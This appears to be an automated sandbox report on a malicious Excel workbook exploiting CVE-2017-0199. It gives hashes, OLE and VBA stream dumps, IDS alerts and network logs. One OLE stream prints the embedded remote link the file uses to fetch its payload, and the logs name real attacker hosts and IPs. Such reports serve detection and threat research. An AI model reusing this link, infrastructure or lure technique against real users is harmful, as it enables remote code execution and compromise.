                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:data
                                                        Category:modified
                                                        Size (bytes):165
                                                        Entropy (8bit):1.4377382811115937
                                                        Encrypted:false
                                                        SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                        MD5:797869BB881CFBCDAC2064F92B26E46F
                                                        SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                        SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                        SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                        Malicious:true
                                                        Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 28 04:37:38 2024, Security: 1
                                                        Entropy (8bit):7.577125228623593
                                                        TrID:
                                                        • Microsoft Excel sheet (30009/1) 47.99%
                                                        • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                        • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                        File name:SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsx
                                                        File size:100'864 bytes
                                                        MD5:476e05dbccfd74ce2aa888a42d0438e8
                                                        SHA1:6e763cf9a6825c5ce3224a4630625659bad08b51
                                                        SHA256:b8fdd158f41abbd97902857a684a23003d32ebe27ba601d83e0778ee1bdd2ea9
                                                        SHA512:06e97d06e6cab423e0e47f0f556670626408b1b8dd12675e46668621908f9441c92f31aa11546e8e6dded618958da2b5cfa5f406e03d2f3b7e40d3048072bc65
                                                        SSDEEP:1536:giqHy1S6F8b2SQrEkawpoXIowXwuMsAcQNeJQUVIKVrrFv/dlwDxqc1afkA+F:oeFHrE2sIo+vMzJ5UVIKFFdCDL1G
                                                        TLSH:63A3F15273ABCD06D4963B714DD1C2D7521ABC16ADA38D4B36A0F35F28FE282D48271B
                                                        File Content Preview:........................>...................................N...................q..............................................................................................................................................................................
                                                        Icon Hash:2562ab89a7b7bfbf
                                                        Document Type:OLE
                                                        Number of OLE Files:1
                                                        Has Summary Info:
                                                        Application Name:Microsoft Excel
                                                        Encrypted Document:True
                                                        Contains Word Document Stream:False
                                                        Contains Workbook/Book Stream:True
                                                        Contains PowerPoint Document Stream:False
                                                        Contains Visio Document Stream:False
                                                        Contains ObjectPool Stream:False
                                                        Flash Objects Count:0
                                                        Contains VBA Macros:True
                                                        Code Page:1252
                                                        Author:WORMS
                                                        Last Saved By:91974
                                                        Create Time:2013-09-08T10:39:32Z
                                                        Last Saved Time:2024-10-22T13:14:21Z
                                                        Creating Application:Microsoft Excel
                                                        Security:0
                                                        Document Code Page:1252
                                                        Thumbnail Scaling Desired:false
                                                        Company:MAHIEDDINE
                                                        Contains Dirty Links:false
                                                        Shared Document:false
                                                        Changed Hyperlinks:false
                                                        Application Version:12.0000
                                                        General
                                                        Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                        VBA File Name:Sheet1.cls
                                                        Stream Size:977
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 51 03 09 84 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Attribute VB_Name = "Sheet1"
                                                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                        Attribute VB_GlobalNameSpace = False
                                                        Attribute VB_Creatable = False
                                                        Attribute VB_PredeclaredId = True
                                                        Attribute VB_Exposed = True
                                                        Attribute VB_TemplateDerived = False
                                                        Attribute VB_Customizable = True
                                                        

                                                        General
                                                        Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                        VBA File Name:Sheet2.cls
                                                        Stream Size:977
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . r . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 51 03 72 b2 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Attribute VB_Name = "Sheet2"
                                                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                        Attribute VB_GlobalNameSpace = False
                                                        Attribute VB_Creatable = False
                                                        Attribute VB_PredeclaredId = True
                                                        Attribute VB_Exposed = True
                                                        Attribute VB_TemplateDerived = False
                                                        Attribute VB_Customizable = True
                                                        

                                                        General
                                                        Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                        VBA File Name:Sheet3.cls
                                                        Stream Size:977
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . * . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 51 03 2a af 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Attribute VB_Name = "Sheet3"
                                                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                        Attribute VB_GlobalNameSpace = False
                                                        Attribute VB_Creatable = False
                                                        Attribute VB_PredeclaredId = True
                                                        Attribute VB_Exposed = True
                                                        Attribute VB_TemplateDerived = False
                                                        Attribute VB_Customizable = True
                                                        

                                                        General
                                                        Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                        VBA File Name:ThisWorkbook.cls
                                                        Stream Size:985
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . ? . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 .
                                                        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 51 03 07 3f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Attribute VB_Name = "ThisWorkbook"
                                                        Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                        Attribute VB_GlobalNameSpace = False
                                                        Attribute VB_Creatable = False
                                                        Attribute VB_PredeclaredId = True
                                                        Attribute VB_Exposed = True
                                                        Attribute VB_TemplateDerived = False
                                                        Attribute VB_Customizable = True
                                                        

                                                        General
                                                        Stream Path:\x1CompObj
                                                        CLSID:
                                                        File Type:data
                                                        Stream Size:114
                                                        Entropy:4.25248375192737
                                                        Base64 Encoded:True
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                        General
                                                        Stream Path:\x5DocumentSummaryInformation
                                                        CLSID:
                                                        File Type:data
                                                        Stream Size:244
                                                        Entropy:2.889430592781307
                                                        Base64 Encoded:False
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                        General
                                                        Stream Path:\x5SummaryInformation
                                                        CLSID:
                                                        File Type:data
                                                        Stream Size:200
                                                        Entropy:3.2603503175049817
                                                        Base64 Encoded:False
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . ( . . . . . . . . .
                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                        General
                                                        Stream Path:MBD0079EECB/\x1CompObj
                                                        CLSID:
                                                        File Type:data
                                                        Stream Size:99
                                                        Entropy:3.631242196770981
                                                        Base64 Encoded:False
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                        General
                                                        Stream Path:MBD0079EECB/Package
                                                        CLSID:
                                                        File Type:Microsoft Excel 2007+
                                                        Stream Size:38341
                                                        Entropy:7.85773182578822
                                                        Base64 Encoded:True
                                                        Data ASCII:P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                        Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        General
                                                        Stream Path:MBD0079EECC/\x1Ole
                                                        CLSID:
                                                        File Type:data
                                                        Stream Size:680
                                                        Entropy:4.470650715559736
                                                        Base64 Encoded:False
                                                        Data ASCII:. . . . . M u [ F K . . . . . . . . . . . . J . . . y . . . K . F . . . h . t . t . p . s . : . / . / . q . r . i . s . n . i . . . m . e . / . L . 4 . 4 . V . B . p . ? . & . w . a . t . e . r . s . p . o . u . t . = . t . o . o . t . h . s . o . m . e . & . w . a . s . h . b . a . s . i . n . = . b . e . r . s . e . r . k . & . b . e . e . r . = . u . n . a . b . l . e . & . a . t . t . o . r . n . e . y . = . m . a . g . i . c . a . l . & . f . r . i . c . t . i . o . n . = . r . e . m . i . n . i . s .
                                                        Data Raw:01 00 00 02 93 06 4d 75 5b c4 46 4b 00 00 00 00 00 00 00 00 00 00 00 00 4a 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 46 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 71 00 72 00 69 00 73 00 6e 00 69 00 2e 00 6d 00 65 00 2f 00 4c 00 34 00 34 00 56 00 42 00 70 00 3f 00 26 00 77 00 61 00 74 00 65 00 72 00 73 00 70 00 6f 00 75 00 74 00 3d 00 74 00 6f 00 6f 00
                                                        General
                                                        Stream Path:Workbook
                                                        CLSID:
                                                        File Type:Applesoft BASIC program data, first line number 16
                                                        Stream Size:47157
                                                        Entropy:7.974277826009591
                                                        Base64 Encoded:True
                                                        Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . H . . K G . . t s ` } M } . 6 . . . . X / { S ~ . . . . . . . . . . . \\ . p . ' R k F " V N S . k P . $ . ] N ' [ . . A . 1 . . J ' . . . A . . . s e r . . ~ . . z | . . n . N . + : R . B . . . a . . . . . . . = . . . ! W . . . . 5 Q . ( ) / f . . . . . . . . " . . . . . l . . . . . . . . . L . . . . . . = . . . . h ~ _ 3 + . I . T . . o s @ . . . R . . . " . . . t [ . . . . e . . . r . . . C 1 . . . 9 R . 8 + . ~ ) ` ( . % | . K K u 1 . . . . x O \\ .
                                                        Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 c3 48 cd 9c 01 a3 4b 47 18 c1 a8 ea c1 df 8e 74 73 a7 60 bb a7 7d a0 b8 aa 4d ad 7d 7f db 36 17 c5 a6 b5 01 a2 0b ba 86 c5 58 2f 7b 91 c4 53 7e e1 00 02 00 b0 04 c1 00 02 00 16 c9 e2 00 00 00 5c 00 70 00 b5 ab f2 27 f3 f1 52 82 6b a7 46 9b 22 c6 56 4e b9 53 b4 97 c8 a9 6b 9d 9c 50 0a be 97 ce
                                                        General
                                                        Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                        CLSID:
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Stream Size:523
                                                        Entropy:5.248318095249408
                                                        Base64 Encoded:True
                                                        Data ASCII:I D = " { D 8 F A 0 9 6 E - 3 F 2 3 - 4 1 8 E - A 6 D D - D D 8 A C 2 E 0 F 1 0 1 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 2 3 0 2 7 8 E F 6 9 2 F 6 9 2 F
                                                        Data Raw:49 44 3d 22 7b 44 38 46 41 30 39 36 45 2d 33 46 32 33 2d 34 31 38 45 2d 41 36 44 44 2d 44 44 38 41 43 32 45 30 46 31 30 31 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                        General
                                                        Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                        CLSID:
                                                        File Type:data
                                                        Stream Size:104
                                                        Entropy:3.0488640812019017
                                                        Base64 Encoded:False
                                                        Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                        Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                        General
                                                        Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                        CLSID:
                                                        File Type:data
                                                        Stream Size:2644
                                                        Entropy:3.9840946691446373
                                                        Base64 Encoded:False
                                                        Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                        Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                        General
                                                        Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                        CLSID:
                                                        File Type:data
                                                        Stream Size:553
                                                        Entropy:6.351054668628665
                                                        Base64 Encoded:True
                                                        Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . 8 ] 1 i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
                                                        Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 38 5d 31 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-10-28T11:21:27.619176+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249164107.175.113.21480TCP
                                                        2024-10-28T11:21:27.619196+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1107.175.113.21480192.168.2.2249164TCP
                                                        2024-10-28T11:21:30.631541+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249166107.175.113.21480TCP
                                                        2024-10-28T11:21:30.631566+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1107.175.113.21480192.168.2.2249166TCP
                                                        2024-10-28T11:22:52.726485+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.2249168199.217.106.226443TCP
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Oct 28, 2024 11:21:25.354080915 CET49163443192.168.2.22188.114.96.3
                                                        Oct 28, 2024 11:21:25.354166031 CET44349163188.114.96.3192.168.2.22
                                                        Oct 28, 2024 11:21:25.354307890 CET49163443192.168.2.22188.114.96.3
                                                        Oct 28, 2024 11:21:25.360567093 CET49163443192.168.2.22188.114.96.3
                                                        Oct 28, 2024 11:21:25.360601902 CET44349163188.114.96.3192.168.2.22
                                                        Oct 28, 2024 11:21:25.977464914 CET44349163188.114.96.3192.168.2.22
                                                        Oct 28, 2024 11:21:25.977550983 CET49163443192.168.2.22188.114.96.3
                                                        Oct 28, 2024 11:21:25.984877110 CET49163443192.168.2.22188.114.96.3
                                                        Oct 28, 2024 11:21:25.984911919 CET44349163188.114.96.3192.168.2.22
                                                        Oct 28, 2024 11:21:25.985446930 CET44349163188.114.96.3192.168.2.22
                                                        Oct 28, 2024 11:21:25.985519886 CET49163443192.168.2.22188.114.96.3
                                                        Oct 28, 2024 11:21:26.064201117 CET49163443192.168.2.22188.114.96.3
                                                        Oct 28, 2024 11:21:26.107371092 CET44349163188.114.96.3192.168.2.22
                                                        Oct 28, 2024 11:21:26.807082891 CET44349163188.114.96.3192.168.2.22
                                                        Oct 28, 2024 11:21:26.807157993 CET49163443192.168.2.22188.114.96.3
                                                        Oct 28, 2024 11:21:26.807221889 CET44349163188.114.96.3192.168.2.22
                                                        Oct 28, 2024 11:21:26.807245970 CET44349163188.114.96.3192.168.2.22
                                                        Oct 28, 2024 11:21:26.807301998 CET49163443192.168.2.22188.114.96.3
                                                        Oct 28, 2024 11:21:26.807302952 CET49163443192.168.2.22188.114.96.3
                                                        Oct 28, 2024 11:21:26.949269056 CET49163443192.168.2.22188.114.96.3
                                                        Oct 28, 2024 11:21:26.949295998 CET44349163188.114.96.3192.168.2.22
                                                        Oct 28, 2024 11:21:26.959707022 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:26.965291977 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:26.965382099 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:26.990380049 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:26.996715069 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.619060993 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.619107962 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.619159937 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.619175911 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.619175911 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.619195938 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.619231939 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.619237900 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.619237900 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.619266987 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.619282007 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.619303942 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.619333029 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.619354010 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.619354963 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.619390965 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.619410992 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.619469881 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.619469881 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.625298977 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.625350952 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.625384092 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.625391006 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.625576973 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.625576973 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.734494925 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.734582901 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.734585047 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.734616995 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.734648943 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.734653950 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.734688997 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.734700918 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.734709024 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.734771013 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.735138893 CET8049164107.175.113.214192.168.2.22
